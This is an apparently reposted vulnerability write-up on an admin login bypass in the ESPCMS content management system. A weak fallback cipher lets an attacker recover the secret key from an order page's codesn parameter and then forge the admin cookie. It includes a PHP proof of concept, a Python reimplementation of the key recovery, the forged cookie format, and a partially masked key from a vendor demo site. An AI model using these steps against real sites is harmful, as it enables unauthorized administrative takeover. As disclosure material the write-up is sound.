ESPCMS latest background login bypass DEMO Test

Source: Internet
Author: User
Tags: mcrypt


This is again an encryption/decryption function, but it differs from the one in the previous article.

Look at the encryption and decryption function:

    function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', $mcrype = true) {
        $result = null;
        if ($operation == 'ENCODE') {
            if (extension_loaded('mcrypt') && $mcrype) {
                // mcrypt available and requested: real (Rijndael) encryption
                $result = $this->encryptCookie($string, $key);
            } else {
                // fallback: add one key byte to each plaintext byte, then URL-safe base64
                for ($i = 0; $i < strlen($string); $i++) {
                    $char = substr($string, $i, 1);
                    // note the "- 1": for $i == 0 the index is -1, which substr() maps to the last key char
                    $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                    $char = chr(ord($char) + ord($keychar));
                    $result .= $char;
                }
                $result = base64_encode($result);
                $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
            }
        } elseif ($operation == 'DECODE') {
            if (extension_loaded('mcrypt') && $mcrype) {
                $result = $this->decryptCookie($string, $key);
            } else {
                // fallback: undo the URL-safe base64, then subtract the same key bytes
                $data = str_replace(array('-', '_'), array('+', '/'), $string);
                $mod4 = strlen($data) % 4;
                if ($mod4) {
                    $data .= substr('====', $mod4);
                }
                $string = base64_decode($data);
                for ($i = 0; $i < strlen($string); $i++) {
                    $char = substr($string, $i, 1);
                    $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                    $char = chr(ord($char) - ord($keychar));
                    $result .= $char;
                }
            }
        }
        return $result;
    }





There is one more line than before:

    if (extension_loaded('mcrypt') && $mcrype) {
        $result = $this->encryptCookie($string, $key);
    }



If the mcrypt extension is loaded and $mcrype is true, encryptCookie is called for encryption.

encryptCookie:

    function encryptCookie($value, $key = '@LFK24s224%@safS3s%1f%') {
        if (!$value) {
            return false;
        }
        // ECB mode: the IV is generated but has no effect on the output
        $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);
        $iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
        // the actual cipher key is md5($key), the hex digest of the configured secret
        $crypttext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, md5($key), $value, MCRYPT_MODE_ECB, $iv);
        return trim(base64_encode($crypttext));
    }



PHP's built-in encryption function .. no way around that one.

When the cookies for members and backend users are encrypted, $mcrype is left at its default of true, so the previous method does not work.

However, in the /interface/ordermain.php file, $mcrype is set to FALSE when encrypting:

    function in_read() {
        ............
        $payobj = new $plugcode();
        // last argument is FALSE: the weak fallback is used, with db_pscode as the key
        $codesn = $this->fun->eccode($plugcode . $read['ordersn'] . $oid, 'ENCODE', db_pscode, FALSE);
        $respondArray = array('code' => $plugcode, 'ordersn' => $read['ordersn'], 'oid' => $oid, 'codesn' => $codesn);
        $return_url = $this->get_link('paybackurl', $respondArray, admin_LNG, 0, 1);
        ..........



We can use the previous method to recover the key (db_pscode) from this codesn.
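To make concrete why the non-mcrypt fallback must never share a key with the admin cookie, here is an added Python reimplementation of eccode's fallback path. This is editor-added example code, not ESPCMS code; SAMPLE_KEY and SAMPLE_PLAIN are constructed values standing in for db_pscode and for code.ordersn.oid, not any site's real secret. It shows that one known plaintext/codesn pair yields the key stream byte by byte, and that the "- 1" in the key index merely rotates that stream by one position.

```python
import base64

def _keychar(key: bytes, i: int) -> int:
    # Mirrors substr($key, ($i % strlen($key)) - 1, 1): for i == 0 the index
    # is -1, which both PHP and Python resolve to the last byte of the key.
    return key[(i % len(key)) - 1]

def eccode_fallback(data: bytes, key: bytes, operation: str = "DECODE") -> bytes:
    """eccode() as it behaves when $mcrype is FALSE: one key byte is added to
    (or subtracted from) each data byte, wrapped in URL-safe base64 without '='."""
    if operation == "ENCODE":
        mixed = bytes((b + _keychar(key, i)) % 256 for i, b in enumerate(data))
        return base64.urlsafe_b64encode(mixed).rstrip(b"=")
    raw = base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))  # restore padding
    return bytes((b - _keychar(key, i)) % 256 for i, b in enumerate(raw))

def key_stream_from_known_plaintext(codesn: bytes, plaintext: bytes) -> bytes:
    """ciphertext[i] == plaintext[i] + key[(i - 1) % L] (mod 256), so whoever
    holds one (plaintext, codesn) pair reads the key stream off directly;
    this is exactly what the page's PoC prints."""
    raw = base64.urlsafe_b64decode(codesn + b"=" * (-len(codesn) % 4))
    return bytes((c - p) % 256 for c, p in zip(raw, plaintext))

def recover_key(codesn: bytes, plaintext: bytes, key_len: int) -> bytes:
    """Undo the one-position rotation caused by the '- 1' index. Needs a known
    plaintext of at least key_len bytes (a 32-char md5-style key needs 32)."""
    stream = key_stream_from_known_plaintext(codesn, plaintext)
    if len(stream) < key_len:
        raise ValueError("known plaintext is shorter than the key")
    return stream[1:key_len] + stream[:1]

# Constructed sample values; SAMPLE_KEY stands in for db_pscode and is not real.
SAMPLE_KEY = b"0123456789abcdef0123456789abcdef"        # 32 chars, md5-like
SAMPLE_PLAIN = b"alipay" + b"ESP-" + b"0" * 18 + b"1000"  # code . ordersn . oid

def demo() -> bool:
    """True when encode/decode round-trips and the key falls out of one codesn."""
    codesn = eccode_fallback(SAMPLE_PLAIN, SAMPLE_KEY, "ENCODE")
    round_trip = eccode_fallback(codesn, SAMPLE_KEY, "DECODE") == SAMPLE_PLAIN
    return round_trip and recover_key(codesn, SAMPLE_PLAIN, len(SAMPLE_KEY)) == SAMPLE_KEY
```

The same db_pscode is then what encryptCookie feeds into md5() for the admin cookie, which is why exposing it through the fallback path breaks the backend login.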

The code for checking administrator permissions in the background is as follows:
 

if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl)



Encrypt the following with the obtained key:

1|admin|md5(password)|md5(admin_AGENT)|1|1|md5(admin_ClassURL)

This value can be used to log in to the backend. (The password can be anything; just do not get admin_AGENT and admin_ClassURL wrong.)

-----------------------------------------------------------------------------------

First, register a user, purchase a product, and go to the order view page.

Inspect the elements:


 

return_url=http://demo.ecisp.cn/html/cn/index.php?ac=respond&at=payok&codesn=ls6apsXddYWIjpVlk2eVk5SVkmxiZmpyZ3hoanNsbw&code=alipay&ordersn=ESP-201502240614511702&oid=198

return_url is what we need.

Run the PoC:

    <?php
    $text = "plaintext"; // replace with the concatenated code, ordersn and oid values from the obtained return_url
    $cookie = "ls6apsXddYWIjpVlk2eVk5SVkmxiZmpyZ3hoanNsbw"; // the codesn value
    $cookie = str_replace(array('-', '_'), array('+', '/'), $cookie); // undo the URL-safe alphabet used by eccode
    $bincookie = base64_decode($cookie);
    for ($j = 0; $j < strlen($text); $j++) {
        // each ciphertext byte minus the known plaintext byte gives one key byte
        echo chr(ord($bincookie[$j]) - ord($text[$j]));
    }



Then we get:
 

5b16dd028ac5b2eabab6125A6A88B****



Encrypt it with encryptCookie:
 



Modify the ecisp_admininfo cookie:

and you can log in to the backend.

Solution:

I do not understand why FALSE is needed there .. Login detection should also verify the password; do not put too much trust in data supplied by the user.
